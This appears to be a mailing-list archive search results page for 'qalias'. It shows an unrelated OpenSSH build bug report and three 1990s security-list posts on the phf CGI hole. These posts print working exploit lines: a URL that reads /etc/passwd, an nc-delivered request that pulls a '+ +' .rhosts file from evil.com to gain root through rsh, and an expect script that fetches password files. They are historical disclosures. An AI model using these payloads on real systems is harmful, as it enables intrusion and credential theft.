Displaying 4 results from an estimated 4 matches for "qalias".
Did you mean:
alias
2014 Nov 14
10
[Bug 2315] New: OpenSSH 6.7p1 on AIX 7.1 compile issue
https://bugzilla.mindrot.org/show_bug.cgi?id=2315
Bug ID: 2315
Summary: OpenSSH 6.7p1 on AIX 7.1 compile issue
Product: Portable OpenSSH
Version: 6.7p1
Hardware: PPC
OS: AIX
Status: NEW
Severity: normal
Priority: P5
Component: Build system
Assignee: unassigned-bugs at
1996 Dec 06
0
phf & Bash exploit
...es. I would
imagine that most people are aware of the 0x0A escape and so when they
test it on their own box they think they are safe from phf exploitation.
The syntax for the exploit is almost identical to the older phf exploit.
To execute commands: (cat /etc/passwd)
http://server.net/cgi-bin/phf?Qalias=%ffcat%20/etc/passwd
I know this exploit isn''t only confided to linux, but it seems its easiest
to exploit on linux.
If everybody is aware of this, excuse me.
It''s just that I dont think enough admins are aware of this, and they are
leaving their networks very open for exploitat...
1997 Feb 03
1
Linux rcp bug
...aracter is passed to the phf script,
it can execute arbitrary programs as user ''nobody''. So the problem with
rcp can be exploited remotely, and root access can be gained from outside,
for instance like this:
$ echo "+ +" > /tmp/my.rhosts
$ echo "GET /cgi-bin/phf?Qalias=x%0arcp+hacker@evil.com:/tmp/my.rhosts+
/root/.rhosts" | nc -v - 20 victim.com 80
$ rsh -l root victim.com "/bin/sh -i"
#
The fact that this bug can be exploited remotely makes it, I think, quite
serious. We wrote a simple script that searched our home domains (*.cz and
*.sk) for ma...
1997 Sep 28
0
[IPD] Internet Probe Droid
...vironment, and maintain a high level of efficiency. A quick look at
"fetch.exp" will show you what we mean.
----------------------------------------------------------------------
#!/usr/bin/expect --
# Constant
# As a default we query for the passwd file
set pwQuery "/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd"
# We get the address and port id from the command line
set address [lindex $argv 0]
if {$argc == 3} {
set port [lindex $argv 1]
set query [lindex $argv 2]
} elseif {$argc == 2} {
set port [lindex $argv 1]
set query pwQuery
} else {
set port "80...